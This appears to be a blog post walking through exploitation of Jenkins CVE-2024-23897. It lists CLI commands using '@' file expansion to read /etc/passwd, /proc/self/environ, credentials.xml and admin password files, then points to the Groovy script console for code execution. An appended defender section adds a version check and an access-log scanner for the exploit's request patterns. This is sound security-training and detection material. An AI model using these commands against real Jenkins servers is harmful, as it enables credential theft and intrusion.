Notes From the Field: Hacking Jenkins CVE-2024-23897

rootsecdev
3 min read · Feb 19, 2024

Jenkins is a highly sought-after target because of its wide attack surface, especially when the installation hasn't been updated. It's also a favorite of the PEN-200 (OSCP). It's important to know the exploitation vectors of Jenkins, such as default passwords that may still be in use, and how Groovy scripts are used for initial access.

This post will dive into how to read arbitrary files from a Jenkins server running on Linux and recover bcrypt password hashes for offline cracking.

So what is CVE-2024-23897 and how can I leverage it for exploitation?

The interesting part is how a vulnerable version parses the arguments of commands sent through the built-in command line interface: an argument that begins with "@" is treated as a file path, and the file's contents are substituted in its place. That substitution is what turns an ordinary CLI command into an arbitrary file read, so the "@" is the whole trick.

On a Jenkins installation you can pull the command line interface Java utility (jenkins-cli.jar) from the target server using the following command:

wget <ip>:<port>/jnlpJars/jenkins-cli.jar

Once you have the CLI client downloaded, this is the syntax we will be using a lot:

java -jar jenkins-cli.jar -s <jenkins_url> <command>

Some useful commands I use for directory searches and hunting for secrets:

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/secrets/initialAdminPassword

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/etc/passwd

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/proc/self/environ

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/users.xml

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/<user_folder>/config.xml

java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/credentials.xml

Examples of useful commands in action:

[Screenshot: finding Jenkins users]

[Screenshot: dumping bcrypt hashes from a user folder]

Once you are inside a Jenkins box you can execute Groovy scripts by going directly to the script console. To get there directly, open:

<web_url>:<port>/script

This will take you to a Groovy console as shown below:

[Screenshot: Groovy script console]

So Medium is being slightly weird and will not let me post Groovy scripts in this post, so I made a public gist instead. It can be found here:

https://gist.github.com/rootsecdev/273f22a747753e2b17a2fd19c248c4b7
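For the defenders reading along: the two footprints this technique leaves on a Jenkins front end are the download of jenkins-cli.jar from /jnlpJars and the CLI client's requests to the /cli endpoint, and the script console step leaves a request to /script. The following Python script, added here as an example and not part of the original post, does two things an administrator would want: it triages a reported Jenkins version against the affected range (the fixed releases, 2.442 and LTS 2.426.3, come from the Jenkins security advisory for CVE-2024-23897 and are not stated in the post above) and it scans reverse-proxy access-log lines for those request patterns. The log lines embedded in the block are constructed for the example; the function and constant names are my own.

```python
"""
Defender-side triage for CVE-2024-23897 (Jenkins CLI '@file' argument read).

  is_affected(version)    -> True when a Jenkins version string falls in the
                             affected range (weekly <= 2.441, LTS <= 2.426.2).
  scan_access_log(lines)  -> findings for the three request patterns this
                             technique produces on the HTTP front end.
  summarize(findings)     -> per-source-IP counts, which is what you would
                             hand to the incident ticket.
"""
import re

# Fixed releases per the Jenkins advisory (not taken from the post above).
FIXED_WEEKLY = (2, 442)
FIXED_LTS = (2, 426, 3)

# Combined/common log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client fetches the CLI jar, drives /cli twice, then
# opens the script console; a second client is ordinary pipeline traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Feb/2024:10:01:02 +0000] "GET /jnlpJars/jenkins-cli.jar HTTP/1.1" 200 3354122
203.0.113.7 - - [19/Feb/2024:10:01:09 +0000] "POST /cli?remoting=false HTTP/1.1" 200 512
203.0.113.7 - - [19/Feb/2024:10:01:11 +0000] "POST /cli?remoting=false HTTP/1.1" 200 771
198.51.100.4 - - [19/Feb/2024:10:02:30 +0000] "GET /job/build-app/lastBuild/console HTTP/1.1" 200 9120
203.0.113.7 - - [19/Feb/2024:10:05:44 +0000] "GET /script HTTP/1.1" 200 14022
198.51.100.4 - - [19/Feb/2024:10:06:00 +0000] "GET /static/abc123/css/style.css HTTP/1.1" 200 2210
"""


def parse_version(version):
    """'2.426.2' -> (2, 426, 2); rejects anything that is not dotted integers."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Jenkins version: {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(version):
    """LTS versions carry three components and are compared against the LTS fix;
    two-component weekly versions are compared against the weekly fix."""
    v = parse_version(version)
    if len(v) >= 3:
        return v < FIXED_LTS
    return v < FIXED_WEEKLY


def classify(method, path):
    """Map a request to the pattern it matches, tolerating a context path
    such as /jenkins/cli by matching on the path suffix."""
    route = path.split("?", 1)[0]
    if route.endswith("/jnlpJars/jenkins-cli.jar"):
        return "cli_jar_download"
    if method == "POST" and route.endswith("/cli"):
        return "cli_invocation"          # default HTTP transport of jenkins-cli
    if route.endswith("/script") or route.endswith("/scriptText"):
        return "script_console"
    return None


def scan_access_log(lines):
    """Return one finding per matching request; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m["method"], m["path"])
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "kind": kind,
                             "path": m["path"], "status": int(m["status"])})
    return findings


def summarize(findings):
    """{ip: {kind: count}} as plain dicts."""
    summary = {}
    for f in findings:
        summary.setdefault(f["ip"], {})
        summary[f["ip"]][f["kind"]] = summary[f["ip"]].get(f["kind"], 0) + 1
    return summary


if __name__ == "__main__":
    for ver in ("2.441", "2.442", "2.426.2", "2.426.3"):
        print(f"Jenkins {ver}: {'AFFECTED' if is_affected(ver) else 'fixed'}")
    for ip, kinds in summarize(scan_access_log(SAMPLE_LOG.splitlines())).items():
        print(ip, kinds)
```

A source that downloads the jar, immediately POSTs to /cli and then touches /script is the sequence worth alerting on; routine build traffic never hits those three paths together. The scanner only covers the CLI's default HTTP transport: a client using the SSH transport does not pass through the web front end at all, so the version check and an upgrade remain the controls that actually close the hole.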
